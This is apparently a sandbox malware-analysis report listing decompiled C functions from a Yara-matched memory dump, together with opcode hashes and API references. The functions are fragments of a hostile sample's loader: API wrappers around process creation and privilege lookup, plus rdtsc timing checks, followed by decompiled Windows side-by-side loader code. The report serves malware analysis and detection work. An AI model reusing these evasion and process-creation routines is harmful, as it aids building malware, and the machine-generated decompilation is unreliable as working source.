                                                                                                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E004088B0(intOrPtr _a4) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				char _v284;
                                                                                                                                                    				char _v804;
                                                                                                                                                    				char _v840;
                                                                                                                                                    				void* _t28;
                                                                                                                                                    				void* _t35;
                                                                                                                                                    				void* _t37;
                                                                                                                                                    				void* _t38;
                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                    				char* _t52;
                                                                                                                                                    				void* _t54;
                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                    				void* _t57;
                                                                                                                                                    				void* _t58;
                                                                                                                                                    				void* _t59;
                                                                                                                                                    				void* _t60;
                                                                                                                                                    				void* _t61;
                                                                                                                                                    
                                                                                                                                                    				_t56 = _a4;
                                                                                                                                                    				_t43 = 0; // executed
                                                                                                                                                    				_t28 = E00406E00(_t56,  &_v24); // executed
                                                                                                                                                    				_t59 = _t58 + 8;
                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                    					E00407010( &_v24,  &_v840);
                                                                                                                                                    					_t60 = _t59 + 8;
                                                                                                                                                    					do {
                                                                                                                                                    						E00419CD0( &_v284, 0x104);
                                                                                                                                                    						E0041A340( &_v284,  &_v804);
                                                                                                                                                    						_t61 = _t60 + 0x10;
                                                                                                                                                    						_t54 = 0x4f;
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_t35 = E00413DD0(E00413D70(_t56, _t54),  &_v284);
                                                                                                                                                    							_t61 = _t61 + 0x10;
                                                                                                                                                    							if(_t35 != 0) {
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_t54 = _t54 + 1;
                                                                                                                                                    							if(_t54 <= 0x62) {
                                                                                                                                                    								continue;
                                                                                                                                                    							} else {
                                                                                                                                                    							}
                                                                                                                                                    							goto L8;
                                                                                                                                                    						}
                                                                                                                                                    						_t9 = _t56 + 0x14; // 0xffffe1a5
                                                                                                                                                    						 *(_t56 + 0x474) =  *(_t56 + 0x474) ^  *_t9;
                                                                                                                                                    						_t43 = 1;
                                                                                                                                                    						L8:
                                                                                                                                                    						_t52 =  &_v840;
                                                                                                                                                    						_t37 = E00407040( &_v24, _t52);
                                                                                                                                                    						_t60 = _t61 + 8;
                                                                                                                                                    					} while (_t37 != 0 && _t43 == 0);
                                                                                                                                                    					_t38 = E004070C0(_t56,  &_v24); // executed
                                                                                                                                                    					if(_t43 == 0) {
                                                                                                                                                    						asm("rdtsc");
                                                                                                                                                    						asm("rdtsc");
                                                                                                                                                    						_t42 = _t38 - 0 + _t38;
                                                                                                                                                    						_v8 = _t42;
                                                                                                                                                    						 *((intOrPtr*)(_t56 + 0x55c)) =  *((intOrPtr*)(_t56 + 0x55c)) + 0xffffffba;
                                                                                                                                                    						_t18 = _t57 + _t42;
                                                                                                                                                    						_t19 = _t43;
                                                                                                                                                    						_t43 =  *_t18;
                                                                                                                                                    						 *_t18 = _t19;
                                                                                                                                                    						 *((intOrPtr*)(_t52 - 0x75cea200)) =  *((intOrPtr*)(_t52 - 0x75cea200)) + _t43;
                                                                                                                                                    					}
                                                                                                                                                    					 *((intOrPtr*)(_t56 + 0x31)) =  *((intOrPtr*)(_t56 + 0x31)) + _t43;
                                                                                                                                                    					_t24 = _t56 + 0x31; // 0x5608758b
                                                                                                                                                    					 *((intOrPtr*)(_t56 + 0x32)) =  *((intOrPtr*)(_t56 + 0x32)) +  *_t24 + 1;
                                                                                                                                                    					return 1;
                                                                                                                                                    				} else {
                                                                                                                                                    					return _t28;
                                                                                                                                                    				}
                                                                                                                                                    			}























                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                    • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                    • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                    				char _v67;
                                                                                                                                                    				char _v68;
                                                                                                                                                    				void* _t12;
                                                                                                                                                    				intOrPtr* _t13;
                                                                                                                                                    				int _t14;
                                                                                                                                                    				long _t21;
                                                                                                                                                    				intOrPtr* _t25;
                                                                                                                                                    				void* _t26;
                                                                                                                                                    				void* _t30;
                                                                                                                                                    
                                                                                                                                                    				_t30 = __eflags;
                                                                                                                                                    				_v68 = 0;
                                                                                                                                                    				E00419D20( &_v67, 0, 0x3f);
                                                                                                                                                    				E0041A900( &_v68, 3);
                                                                                                                                                    				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                    				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                                                    				_t25 = _t13;
                                                                                                                                                    				if(_t25 != 0) {
                                                                                                                                                    					_t21 = _a8;
                                                                                                                                                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                                                                    					_t32 = _t14;
                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                    					}
                                                                                                                                                    					return _t14;
                                                                                                                                                    				}
                                                                                                                                                    				return _t13;
                                                                                                                                                    			}













                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                                                    • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                                                    • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E00418540(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
                                                                                                                                                    				void* _t22;
                                                                                                                                                    				void* _t33;
                                                                                                                                                    				intOrPtr* _t34;
                                                                                                                                                    
                                                                                                                                                    				_t16 = _a4;
                                                                                                                                                    				_t34 = _a4 + 0xc80;
                                                                                                                                                    				E00418DC0(_t33, _t16, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
                                                                                                                                                    				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                                                                                                                    				return _t22;
                                                                                                                                                    			}







                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418594
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 31%
                                                                                                                                                    			E00418621(signed int __eax, void* __ecx, char _a1, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20) {
                                                                                                                                                    				int _t12;
                                                                                                                                                    				void* _t19;
                                                                                                                                                    
                                                                                                                                                    				_pop(_t19);
                                                                                                                                                    				asm("rcr byte [edi], cl");
                                                                                                                                                    				 *(__eax | 0x00000077) = __ecx;
                                                                                                                                                    				asm("sbb al, 0xdd");
                                                                                                                                                    				asm("pushad");
                                                                                                                                                    				asm("sbb al, 0x55");
                                                                                                                                                    				_push( &_a1);
                                                                                                                                                    				_t9 = _a8;
                                                                                                                                                    				E00418DC0(_t19, _a8, _a8 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
                                                                                                                                                    				_t12 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
                                                                                                                                                    				return _t12;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                    				char _t10;
                                                                                                                                                    				void* _t15;
                                                                                                                                                    
                                                                                                                                                    				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                                                    				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                    				return _t10;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                                                    				void* _t10;
                                                                                                                                                    				void* _t15;
                                                                                                                                                    
                                                                                                                                                    				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                    				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                                                    				return _t10;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                    				int _t10;
                                                                                                                                                    				void* _t15;
                                                                                                                                                    
                                                                                                                                                    				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                    				return _t10;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418510(intOrPtr _a4, int _a8) {
                                                                                                                                                    				void* _t10;
                                                                                                                                                    
                                                                                                                                                    				_t5 = _a4;
                                                                                                                                                    				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                    				ExitProcess(_a8);
                                                                                                                                                    			}





                                                                                                                                                    APIs
                                                                                                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                    			E00C8C5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				char _v544;
                                                                                                                                                    				char _v1064;
                                                                                                                                                    				char _v1068;
                                                                                                                                                    				char _v1069;
                                                                                                                                                    				signed short* _v1076;
                                                                                                                                                    				signed short _v1080;
                                                                                                                                                    				intOrPtr _v1084;
                                                                                                                                                    				signed short _v1086;
                                                                                                                                                    				char _v1088;
                                                                                                                                                    				char _v1092;
                                                                                                                                                    				signed short _v1096;
                                                                                                                                                    				char _v1100;
                                                                                                                                                    				char* _v1104;
                                                                                                                                                    				short _v1106;
                                                                                                                                                    				char _v1108;
                                                                                                                                                    				char _v1111;
                                                                                                                                                    				char _v1112;
                                                                                                                                                    				signed short _v1116;
                                                                                                                                                    				char _v1120;
                                                                                                                                                    				intOrPtr _v1124;
                                                                                                                                                    				short _v1126;
                                                                                                                                                    				char _v1128;
                                                                                                                                                    				intOrPtr _v1132;
                                                                                                                                                    				intOrPtr _v1136;
                                                                                                                                                    				intOrPtr _v1140;
                                                                                                                                                    				char _v1144;
                                                                                                                                                    				intOrPtr _v1148;
                                                                                                                                                    				short _v1150;
                                                                                                                                                    				char _v1152;
                                                                                                                                                    				char* _v1156;
                                                                                                                                                    				short _v1158;
                                                                                                                                                    				char _v1160;
                                                                                                                                                    				intOrPtr _v1164;
                                                                                                                                                    				intOrPtr _v1172;
                                                                                                                                                    				intOrPtr _v1176;
                                                                                                                                                    				char _v1180;
                                                                                                                                                    				intOrPtr _v1184;
                                                                                                                                                    				intOrPtr _v1188;
                                                                                                                                                    				intOrPtr _v1192;
                                                                                                                                                    				char* _v1196;
                                                                                                                                                    				intOrPtr _v1200;
                                                                                                                                                    				char _v1204;
                                                                                                                                                    				char _v1212;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t173;
                                                                                                                                                    				intOrPtr _t175;
                                                                                                                                                    				void* _t191;
                                                                                                                                                    				void* _t193;
                                                                                                                                                    				intOrPtr _t200;
                                                                                                                                                    				char _t215;
                                                                                                                                                    				void* _t226;
                                                                                                                                                    				signed short _t250;
                                                                                                                                                    				void* _t284;
                                                                                                                                                    				signed short _t286;
                                                                                                                                                    				unsigned int _t292;
                                                                                                                                                    				short _t294;
                                                                                                                                                    				signed int _t295;
                                                                                                                                                    				void* _t296;
                                                                                                                                                    
                                                                                                                                                    				_t173 =  *0xd42088; // 0x777dc194
                                                                                                                                                    				_v8 = _t173 ^ _t295;
                                                                                                                                                    				_t175 = _a4;
                                                                                                                                                    				_t272 = _a8;
                                                                                                                                                    				_v1132 = _a16;
                                                                                                                                                    				_v1140 = _a20;
                                                                                                                                                    				_v1160 = 0;
                                                                                                                                                    				_v1158 = 0x208;
                                                                                                                                                    				_v1156 =  &_v1064;
                                                                                                                                                    				_t282 = 0;
                                                                                                                                                    				_t288 = 0;
                                                                                                                                                    				_t286 = _a12;
                                                                                                                                                    				_v1164 = _t175;
                                                                                                                                                    				_v1069 = 0;
                                                                                                                                                    				_v1068 = 0;
                                                                                                                                                    				_v1136 = 0;
                                                                                                                                                    				_v1088 = 0;
                                                                                                                                                    				_v1086 = 0;
                                                                                                                                                    				_v1084 = 0;
                                                                                                                                                    				_v1128 = 0;
                                                                                                                                                    				_v1126 = 0;
                                                                                                                                                    				_v1124 = 0;
                                                                                                                                                    				_v1144 = 0;
                                                                                                                                                    				if(_t175 == 0) {
                                                                                                                                                    					_t282 = 0;
                                                                                                                                                    					L66:
                                                                                                                                                    					_push(_t282);
                                                                                                                                                    					_push(_t286);
                                                                                                                                                    					_push(_t272);
                                                                                                                                                    					_push(_t175);
                                                                                                                                                    					L00CB3F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
                                                                                                                                                    					_t288 = 0xc000000d;
                                                                                                                                                    					L18:
                                                                                                                                                    					if(_v1069 == 0) {
                                                                                                                                                    						L20:
                                                                                                                                                    						if(_v1084 != 0) {
                                                                                                                                                    							 *0xc6e6f0(_v1084);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v1068 != 0) {
                                                                                                                                                    							E00C5F9F0(_v1068);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v1136 != 0) {
                                                                                                                                                    							E00C6E025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
                                                                                                                                                    						}
                                                                                                                                                    						L23:
                                                                                                                                                    						return E00C6E1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
                                                                                                                                                    					}
                                                                                                                                                    					L19:
                                                                                                                                                    					_v1120 = _v1144;
                                                                                                                                                    					_v1132(4,  &_v1120, _v1140);
                                                                                                                                                    					goto L20;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
                                                                                                                                                    					_t282 =  *((intOrPtr*)(_t175 + 4));
                                                                                                                                                    					goto L66;
                                                                                                                                                    				} else {
                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
                                                                                                                                                    						goto L23;
                                                                                                                                                    					}
                                                                                                                                                    					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
                                                                                                                                                    					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
                                                                                                                                                    					_t291 =  *((intOrPtr*)(_t191 + 0x50));
                                                                                                                                                    					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
                                                                                                                                                    					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
                                                                                                                                                    						_push(_t272);
                                                                                                                                                    						L00CB3F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
                                                                                                                                                    						L39:
                                                                                                                                                    						_t288 = 0xc0000106;
                                                                                                                                                    						goto L20;
                                                                                                                                                    					}
                                                                                                                                                    					if(( *(_t191 + 4) & 0x00000010) != 0) {
                                                                                                                                                    						L27:
                                                                                                                                                    						_v1076 =  &_v1160;
                                                                                                                                                    						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
                                                                                                                                                    						_v1080 = _t286;
                                                                                                                                                    						if(_t286 == 0) {
                                                                                                                                                    							_t288 = 0xc00000e5;
                                                                                                                                                    							goto L23;
                                                                                                                                                    						}
                                                                                                                                                    						_t193 = E00C78342(_t286, 0x5c);
                                                                                                                                                    						_pop(_t272);
                                                                                                                                                    						if(_t193 == 0) {
                                                                                                                                                    							_t288 = 0xc00000e5;
                                                                                                                                                    							goto L20;
                                                                                                                                                    						}
                                                                                                                                                    						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
                                                                                                                                                    						if(_t286 > 0x208) {
                                                                                                                                                    							if(_t286 > 0xfffe) {
                                                                                                                                                    								goto L39;
                                                                                                                                                    							}
                                                                                                                                                    							_v1086 = _t286;
                                                                                                                                                    							_t200 =  *0xc6e6f4(_t286 & 0x0000ffff);
                                                                                                                                                    							_v1084 = _t200;
                                                                                                                                                    							if(_t200 != 0) {
                                                                                                                                                    								_v1076 =  &_v1088;
                                                                                                                                                    								goto L30;
                                                                                                                                                    							}
                                                                                                                                                    							_t288 = 0xc0000017;
                                                                                                                                                    							goto L20;
                                                                                                                                                    						}
                                                                                                                                                    						L30:
                                                                                                                                                    						_t292 = _t286 & 0x0000ffff;
                                                                                                                                                    						E00C62340(_v1076[2], _v1080, _t292 - 2);
                                                                                                                                                    						_t272 = 0;
                                                                                                                                                    						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
                                                                                                                                                    						_t296 = _t296 + 0xc;
                                                                                                                                                    						 *_v1076 = _t286;
                                                                                                                                                    						L15:
                                                                                                                                                    						if(_v1068 == 0) {
                                                                                                                                                    							if(L00C7DA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
                                                                                                                                                    								L00CB3F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
                                                                                                                                                    								_t288 = 0xc000003a;
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							_v1136 = _v1124;
                                                                                                                                                    							_t215 = _v1180;
                                                                                                                                                    							if(_t215 != 0) {
                                                                                                                                                    								_v1128 = _t215;
                                                                                                                                                    								_v1124 = _v1176;
                                                                                                                                                    							} else {
                                                                                                                                                    								_v1172 = 0;
                                                                                                                                                    							}
                                                                                                                                                    							_v1200 = _v1172;
                                                                                                                                                    							_push(0x21);
                                                                                                                                                    							_v1196 =  &_v1128;
                                                                                                                                                    							_push(3);
                                                                                                                                                    							_push( &_v1212);
                                                                                                                                                    							_push( &_v1204);
                                                                                                                                                    							_push(0x100020);
                                                                                                                                                    							_v1204 = 0x18;
                                                                                                                                                    							_v1192 = 0x40;
                                                                                                                                                    							_v1188 = 0;
                                                                                                                                                    							_v1184 = 0;
                                                                                                                                                    							_t288 = L00C5FD74( &_v1068);
                                                                                                                                                    							E00C7A331( &_v1180, _t272,  &_v1180);
                                                                                                                                                    							if(_t288 >= 0) {
                                                                                                                                                    								goto L16;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push(_t288);
                                                                                                                                                    								L00CB3F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L16:
                                                                                                                                                    						_t226 = L00C8CC91(_v1164, _a12, _v1076,  &_v1068);
                                                                                                                                                    						_t288 = _t226;
                                                                                                                                                    						if(_t226 < 0) {
                                                                                                                                                    							L00CB3F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
                                                                                                                                                    						} else {
                                                                                                                                                    							_t288 = 0;
                                                                                                                                                    						}
                                                                                                                                                    						goto L18;
                                                                                                                                                    					}
                                                                                                                                                    					_v1076 = 0;
                                                                                                                                                    					_t294 =  *((intOrPtr*)(_t191 + 0x50));
                                                                                                                                                    					_v1152 = _t294;
                                                                                                                                                    					_v1150 = _t294;
                                                                                                                                                    					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
                                                                                                                                                    					_v1108 = 0;
                                                                                                                                                    					_v1106 = 0x216;
                                                                                                                                                    					_v1104 =  &_v544;
                                                                                                                                                    					_v1120 = _t272;
                                                                                                                                                    					_v1116 = _t286;
                                                                                                                                                    					_v1112 = 0;
                                                                                                                                                    					_v1100 = 0;
                                                                                                                                                    					_v1092 = 0;
                                                                                                                                                    					_v1096 = 0;
                                                                                                                                                    					_v1132(1,  &_v1120, _v1140);
                                                                                                                                                    					if(_v1092 != 0) {
                                                                                                                                                    						_t288 = 0xc0000120;
                                                                                                                                                    						goto L20;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v1100 != 0) {
                                                                                                                                                    						_t288 = E00C8D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
                                                                                                                                                    						if(_t288 >= 0) {
                                                                                                                                                    							_t288 = L00C8CC91(_v1164, _t286,  &_v1108,  &_v1068);
                                                                                                                                                    							if(_t288 >= 0) {
                                                                                                                                                    								_t288 = 0;
                                                                                                                                                    								goto L20;
                                                                                                                                                    							}
                                                                                                                                                    							_push(_t288);
                                                                                                                                                    							_push(_t286);
                                                                                                                                                    							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
                                                                                                                                                    							L50:
                                                                                                                                                    							_push(0);
                                                                                                                                                    							_push(0x33);
                                                                                                                                                    							L00CB3F92();
                                                                                                                                                    							goto L20;
                                                                                                                                                    						}
                                                                                                                                                    						_push(_t288);
                                                                                                                                                    						_push( &_v1108);
                                                                                                                                                    						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
                                                                                                                                                    						goto L50;
                                                                                                                                                    					}
                                                                                                                                                    					_v1144 = _v1112;
                                                                                                                                                    					_t250 = _v1096;
                                                                                                                                                    					_t286 = 0;
                                                                                                                                                    					_v1080 = _t250;
                                                                                                                                                    					_v1069 = 1;
                                                                                                                                                    					if(_t250 <= 0) {
                                                                                                                                                    						L14:
                                                                                                                                                    						if(_t286 == _v1080) {
                                                                                                                                                    							L59:
                                                                                                                                                    							_push(_t286);
                                                                                                                                                    							L00CB3F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
                                                                                                                                                    							_t288 = 0xc0150004;
                                                                                                                                                    							goto L19;
                                                                                                                                                    						}
                                                                                                                                                    						goto L15;
                                                                                                                                                    					} else {
                                                                                                                                                    						goto L10;
                                                                                                                                                    					}
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L10:
                                                                                                                                                    						_v1120 = _v1144;
                                                                                                                                                    						_v1108 = 0;
                                                                                                                                                    						_v1106 = 0x216;
                                                                                                                                                    						_v1104 =  &_v544;
                                                                                                                                                    						_v1116 = _t286;
